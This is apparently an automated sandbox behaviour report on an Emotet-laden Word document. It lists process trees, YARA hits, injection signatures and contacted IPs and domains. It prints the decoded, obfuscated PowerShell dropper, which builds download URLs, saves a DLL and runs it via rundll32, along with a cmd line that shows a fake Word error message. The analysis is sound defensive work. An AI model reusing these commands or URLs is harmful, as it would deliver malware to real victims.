Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003D12C1 mov eax, dword ptr fs:[00000030h] 11_2_003D12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001F12C1 mov eax, dword ptr fs:[00000030h] 12_2_001F12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00661D4D mov eax, dword ptr fs:[00000030h] 13_2_00661D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001B12C1 mov eax, dword ptr fs:[00000030h] 13_2_001B12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00411D4D mov eax, dword ptr fs:[00000030h] 14_2_00411D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001D12C1 mov eax, dword ptr fs:[00000030h] 14_2_001D12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00171D4D mov eax, dword ptr fs:[00000030h] 15_2_00171D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_002B12C1 mov eax, dword ptr fs:[00000030h] 15_2_002B12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00281D4D mov eax, dword ptr fs:[00000030h] 16_2_00281D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_001A12C1 mov eax, dword ptr fs:[00000030h] 16_2_001A12C1
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 217.160.169.110 144 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 51.255.203.164 144 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.183.16.47 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 84.232.229.24 80 Jump to behavior
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ') Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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 Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2102828167.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2094445834.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2095209420.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2097508616.0000000000300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2101092569.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2108344528.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2338438182.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2102745390.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2100869950.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2107877116.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2099763419.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2094474454.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2098058880.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2101004097.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2098090844.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2108318970.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2338458694.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2095115818.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2095854537.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2107894176.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2099872528.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2098968815.0000000000140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2092243778.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.660000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.660000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.410000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Behavior Graph ID: 344718 Sample: ARCH_25_012021.doc Startdate: 27/01/2021 Architecture: WINDOWS Score: 100

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 14 other signatures

Process tree (as shown in the behavior graph):

  • WINWORD.EXE started
  • cmd.exe started (signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found)
    • msg.exe started
    • powershell.exe started (contacts shannared.com 192.169.223.13, 49165, 80 AS-26496-GO-DADDY-COM-LLCUS United States; drops C:\Users\user\Kaktksw\An6othh\N49I.dll, PE32; signature: Powershell drops PE file)
      • rundll32.exe started
        • rundll32.exe started
          • rundll32.exe started (signature: Hides that the sample has been downloaded from the Internet (zone.identifier))
            • rundll32.exe started
              • rundll32.exe started (signature: Hides that the sample has been downloaded from the Internet (zone.identifier))
                • rundll32.exe started
                  • rundll32.exe started (signature: Hides that the sample has been downloaded from the Internet (zone.identifier))
                    • rundll32.exe started

Contacted Public IPs

IP               Domain   Country        ASN     ASN Name                        Malicious
217.160.169.110  unknown  Germany        8560    ONEANDONE-ASBrauerstrasse48DE   true
185.183.16.47    unknown  Spain          201453  AKIWIFIAKIWIFIES                true
51.255.203.164   unknown  France         16276   OVHFR                           true
84.232.229.24    unknown  Romania        8708    RCS-RDS73-75DrStaicoviciRO      true
192.169.223.13   unknown  United States  26496   AS-26496-GO-DADDY-COM-LLCUS     true

Contacted Domains

Name IP Active
shannared.com 192.169.223.13 true

Contacted URLs

Name                                  Malicious  Antivirus Detection       Reputation
http://shannared.com/content/lhALeS/  true       Avira URL Cloud: malware  unknown